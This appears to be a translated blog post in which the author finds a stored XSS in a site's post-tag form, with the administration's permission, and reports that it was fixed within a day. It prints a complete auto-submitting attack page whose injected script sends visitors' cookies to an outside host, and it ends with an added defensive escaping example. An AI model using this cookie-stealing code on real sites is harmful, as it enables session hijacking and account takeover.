
Hacking accounts through a form and an event. "XSS", to avoid confusion with Cascading Style Sheets

I took the second part of the title from the Wikipedia article. It sounds funny.

I wanted to post some cat pictures, clicked the preview button, watched the content load, and my browser hung for half a second while "my future post" expanded just below the "add" button. I clicked add and was told that I had to give the post at least two tags. I typed "cute cats", and just below it a block appeared from which popular tags could be picked. I decided this was very nice and that I needed such a script for my collection. Without hesitation I pulled the page's JavaScript, opened it, and saw comments in the code in my native Russian.

It was very boring, so I decided to do a little hacking, with the administration's permission, to test my strength and my knowledge of languages and specifications. The whole study took me 2 days, 3-4 hours a day.

I decided to check out the forms and try to break something, find a mistake, or anything else. They were fairly well protected: not a hint of SQL injection or anything like that.

After looking through the site's JS file, I saw that several variables are not filtered at all on the client side, so any code I put into the form can be executed on the page. The first thing I put in was the classic:

<script>alert(1)</script> 


A window dropped down from the sky. It said that everything in this world equals 1.


I must say this is child's play. So we have a simple XSS. We won't be upset; this is enough for us.

I put into the form:

 <script>window.eval = function(code){console.log(code)}</script> 


Having read the errors in the browser, I inserted an <iframe> into the form and saw the window of another site. I checked the Referer field and saw our domain, so if they check the Referer for "own" versus "not own" when validating requests to the server, we can already pretend to be the site itself, send any request, and get an answer.

Only authorized users can be on the page I hacked, and we can present ourselves in the request as the site itself simply by entering any code into the form.

Next I'll give the malicious code that sends the user's cookie to us; I've adapted it so that I don't get scolded too much. The main piece of code that hides my actions on the page I will not give; I'll show only the hack itself.

1) Create a page in the same encoding as the one being attacked.

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<!--   -->
</body>
</html>


I think almost anyone can handle that.

2) In it we must create a form that will send our request from the victim's browser.

<iframe src="#  " method="post"></iframe>
<form action="#  " method="POST">
<input type="hidden" name="#     xss." value=" "/>
</form>


3) Encode our code for submission to the form.

<?php
$txt1 = "<script>var url='<img src=http://www1.hut.ru/testi.shtml?cookie='+document.cookie+'>';</script>";
$txt2 = "<script>document.write(url);</script>";
$txt11 = urlencode($txt1);
$txt22 = urlencode($txt2);
?>


It remains to pass the code to the other domain correctly. I used the urlencode() function. The page describing the function says: "This function is convenient when the encoded string will be used as part of a URL in a request; it is also a convenient way to pass variables to other pages."

4) The hacker JS code.




5) Well, after the page loads, we submit all the data through the form.



Well, that's all; upload it all to the server.

6) Traffic analysis can be done with any online sniffer.

The complete code turned out like this:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<?php
$txt1 = "var url='<img src=#c?cookie='+document.cookie+'>';";
$txt2 = "<script>document.write(url);</script>";
$txt11 = urlencode($txt1);
$txt22 = urlencode($txt2);
?>
<iframe src="#  " method="post"></iframe>
<form action="#  " method="POST">
<input type="hidden" name="story_tags" value=" <script><?php echo $txt11 ;?></script> , <script><?php echo $txt22 ;?></script>"/>
</form>
<script>
window.onload = function() {document.forms[0].submit()}
</script>
</body>
</html>



As a result, if a person comes to our server and their cookies contain the site we need, we collect them immediately. The code does not pretend to be worth discussing or analysing; I am in learning mode. My goal was a baptism by fire: to find at least one vulnerability.
You can defend against this attack by placing the preview inside the tag
<noscript>
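As an added example, not part of the original post or the site's code: the root cause above was that the story_tags value was inserted into the page unfiltered, so a small client-side renderer (hypothetical names escapeHtml and renderTags) that escapes every tag before building markup closes both the <script> and the attribute-breakout variants.

```javascript
// Added example (not from the original post): a tag renderer that never lets
// submitted tag text execute. The post's bug was that the tags typed into the
// form were inserted into the page without any filtering.

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// Split the story_tags field the way the post describes (comma separated),
// drop empty entries, cap the count, and return HTML with every tag escaped.
function renderTags(storyTags, maxTags) {
  var limit = maxTags || 20;
  var tags = String(storyTags)
    .split(',')
    .map(function (t) { return t.trim(); })
    .filter(function (t) { return t.length > 0; })
    .slice(0, limit);
  return tags
    .map(function (t) {
      var safe = escapeHtml(t);
      // The same escaped value is safe both as text and inside a quoted attribute.
      return '<span class="tag" title="' + safe + '">' + safe + '</span>';
    })
    .join(' ');
}

// Self-check: strip our own wrapper and make sure no raw markup characters
// from user input survive in the output.
function leaksMarkup(html) {
  var inner = html
    .replace(/<span class="tag" title="[^"]*">/g, '')
    .replace(/<\/span>/g, '');
  return /[<>"]/.test(inner);
}

// Constructed sample input: the post's alert(1) payload, a normal tag, and an
// attribute-breakout attempt, all in one story_tags value.
var sampleInput = '<script>alert(1)</script>, cute cats, "><img src=x onerror=alert(1)>';

if (typeof module !== 'undefined' && require.main === module) {
  console.log(renderTags(sampleInput));
  console.log('leaks markup:', leaksMarkup(renderTags(sampleInput)));
}
```

Escaping at the point of insertion is the fix; the HttpOnly cookie flag would additionally keep document.cookie out of reach of any script that does slip through.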

P.S. I said thank you, and the vulnerability was closed within the day.

Source: https://habr.com/ru/post/213783/

